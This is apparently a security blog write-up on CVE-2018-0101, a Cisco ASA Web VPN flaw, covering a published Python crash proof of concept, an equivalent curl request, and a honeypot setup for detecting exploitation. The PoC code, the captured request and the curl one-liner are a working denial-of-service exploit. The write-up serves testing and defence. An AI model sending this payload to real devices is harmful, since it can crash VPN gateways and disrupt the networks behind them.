Summary

On 29 January 2018 CVE-2018-0101 - A Remote Code Execution and Denial of Service Vulnerability for Cisco ASA Web VPN - was published featuring a CVSS Base Score of 10.

For those unfamiliar, Common Vulnerability Scoring System or CVSS is a standard used for assessing the severity of vulnerabilities. The score ranges from 0 to 10 with 10 being the most serious.

Proof of concept

On 02 February 2018 @saidelike gave a talk titled “Robin Hood vs Cisco ASA Anyconnect” at Recon Brussels in which he included some XML on slide 19.

Slide 19 from Robin Hood vs Cisco ASA Anyconnect

On 5 February 2018 a proof of concept was published by @zerosum0x0, @jennamagius, and @aleph__naught on pastebin. At first glance it appears to be a python script that sends a request to the server using the XML found earlier in the slides and some other required headers.

#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read @saidelike slides:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#

import requests, sys

headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'

xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
    <host-scan-reply>A</host-scan-reply>
</config-auth>
"""

r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)

print(r.status_code)
print(r.headers)
print(r.text)

So let’s go ahead and test it out!

wget https://pastebin.com/raw/YrBcG2Ln -O poc-cve-2018-0101.py
python3 poc-cve-2018-0101.py https://ciscoasa.glitchwitch.io

Using the PoC results in the following request, confirming my earlier first glance reading.

POST / HTTP/1.1
Host: ciscoasa.glitchwitch.io
User-Agent: Open AnyConnect VPN Agent v7.08-265-gae481214-dirty
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
Content-Length: 156

<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
    <host-scan-reply>A</host-scan-reply>
</config-auth>

With this in mind, the same request can be made using curl.

curl -i -s -k  -X $'POST' \
    -H $'Host: ciscoasa.glitchwitch.io' -H $'User-Agent: Open AnyConnect VPN Agent v7.08-265-gae481214-dirty' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'X-Aggregate-Auth: 1' -H $'X-Transcend-Version: 1' -H $'X-AnyConnect-Platform: linux-64' -H $'X-Support-HTTP-Auth: false' -H $'X-Pad: 0000000000000000000000000000000000000000' -H $'Content-Length: 156' \
    --data-binary $'<?xml version=\"1.0\" encoding=\"UTF-8\"?>\x0a<config-auth client=\"a\" type=\"a\" aggregate-auth-version=\"a\">\x0a    <host-scan-reply>A</host-scan-reply>\x0a</config-auth>\x0a' \
    $'https://ciscoasa.glitchwitch.io/'

Ultimately if the server is vulnerable this request should cause the system to crash. In tests on Cisco ASA 9.2(4), this was the case.

Honey Pot

Okay, so we’ve got a working PoC in both python and a curl request. Now let’s setup a honey pot!

On 08 February 2018 @omercent from cymmetria released a honeypot tool for the detection of this vulnerability. So let’s go ahead and get that setup.

git clone https://github.com/Cymmetria/ciscoasa_honeypot.git
cd ciscoasa_honeypot
pip3 install --upgrade -r requirements.txt

Once that’s done we can start it up.

python3 asa_server.py --help
Usage: asa_server.py [OPTIONS]

  A low interaction honeypot for the Cisco ASA component capable of
  detecting CVE-2018-0101, a DoS and remote code execution vulnerability

Options:
  -h, --host TEXT         Host to listen
  -p, --port INTEGER      Port to listen
  -i, --ike-port INTEGER  Port to listen for IKE
  -s, --enable_ssl        Enable SSL
  -c, --cert TEXT         Certificate File Path (will generate self signed
                          cert if not supplied)
  -v, --verbose           Verbose logging
  --help                  Show this message and exit.

python3 asa_server.py -p 443 -s

Now if we run the PoC on our honeypot we should see the following

CRITICAL:root:{'data': ['A'], 'src': '10.0.0.32', 'spt': 41392}

Conclusion

CVE-2018-0101 is a critical flaw and is more than just a DoS vulnerability. The vulnerability also allows remote unauthenticated attackers to perform Remote Code Execution. Although at the time of writing this, no PoC code currently exists to demonstrate the rce portion.

A big thanks to @saidelike, @zerosum0x0, @jennamagius, @aleph__naught, and @omercent for all of their work.